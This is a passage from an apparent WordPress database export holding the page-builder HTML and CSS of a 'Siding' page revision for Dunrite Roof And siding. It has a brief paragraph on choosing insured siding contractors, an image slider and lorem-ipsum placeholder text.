{\"block_id\":\"2f8e1399-a394-4dc5-afcc-503ec3adb6af\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-2f8e1399-a394-4dc5-afcc-503ec3adb6af\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Dunrite Roof And siding</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph -->\n<p>Few things add curb appeal better than new, clean siding. With so many siding contractors out there to choose from getting started on your project can be a little overwhelming, so let us help!<br><br>Good siding contractors will be able to help you pick the right kind of siding for your home based on budget, climate, design and more! This will make sure that you get the most out of your new or renovated siding.<br><br>Just a note: when going with a new siding contractor be sure they have adequate liability insurance. Anyone with a truck and a ladder can claim to be a siding contractor, so there are plenty of uninsured one-man operations out there. You can never be too careful for a siding installation job that will require the siding contractors to climb on your roof!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"1715a7e2-d9ed-427a-be77-136e8c2c931b\"} -->\n<style type=\"text/css\"> .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-1715a7e2-d9ed-427a-be77-136e8c2c931b skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"efa13df2-51dc-4c44-938f-814450f36d07\"} -->\n<style type=\"text/css\"> .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-efa13df2-51dc-4c44-938f-814450f36d07\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"49885c91-6f61-4ac3-8911-3a58424dd7c7\"} -->\n<style type=\"text/css\"> .block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://cteisys.com/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://cteisys.com/home/slider2/\" class=\"wp-image-34\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/248413504_4961941493820252_6022205579321516239_n.jpg\" alt=\"\" data-id=\"411\" data-link=\"https://cteisys.com/248413504_4961941493820252_6022205579321516239_n/\" class=\"wp-image-411\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/c60adea113fb2f5f80419bb170309509.jpg\" alt=\"\" data-id=\"413\" data-link=\"https://cteisys.com/c60adea113fb2f5f80419bb170309509/\" class=\"wp-image-413\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"baa4317a-0da5-4ce3-9276-68d750099fbb\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-baa4317a-0da5-4ce3-9276-68d750099fbb {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-baa4317a-0da5-4ce3-9276-68d750099fbb\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"8b199e02-8b7a-4370-bd4d-3421bc4a7624\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-8b199e02-8b7a-4370-bd4d-3421bc4a7624 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8b199e02-8b7a-4370-bd4d-3421bc4a7624.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"44cd821a-9dd0-4ac7-9c82-f555d98e54fe\"} -->\n<style type=\"text/css\"> .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-44cd821a-9dd0-4ac7-9c82-f555d98e54fe skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"7ca68574-412c-4830-b622-e36d4f00ea49\"} -->\n<style type=\"text/css\"> .block-7ca68574-412c-4830-b622-e36d4f00ea49 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7ca68574-412c-4830-b622-e36d4f00ea49 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7ca68574-412c-4830-b622-e36d4f00ea49 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7ca68574-412c-4830-b622-e36d4f00ea49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7ca68574-412c-4830-b622-e36d4f00ea49 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7ca68574-412c-4830-b622-e36d4f00ea49\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"24b580d3-82a8-4aa7-832b-5128d624b5e1\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-24b580d3-82a8-4aa7-832b-5128d624b5e1 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-24b580d3-82a8-4aa7-832b-5128d624b5e1 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-24b580d3-82a8-4aa7-832b-5128d624b5e1 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-24b580d3-82a8-4aa7-832b-5128d624b5e1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-24b580d3-82a8-4aa7-832b-5128d624b5e1 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-24b580d3-82a8-4aa7-832b-5128d624b5e1\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/services-single.jpg\" alt=\"\" class=\"wp-image-224\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Siding','','inherit','closed','closed','','215-revision-v1','','','2022-08-23 18:33:01','2022-08-23 18:33:01','',215,'https://cteisys.com/?p=433',0,'revision','',0),(431,1,'2022-08-23 18:29:51','2022-08-23 18:29:51','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"30125cb2-5b1a-4355-96e3-c2a9ea89f965\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image 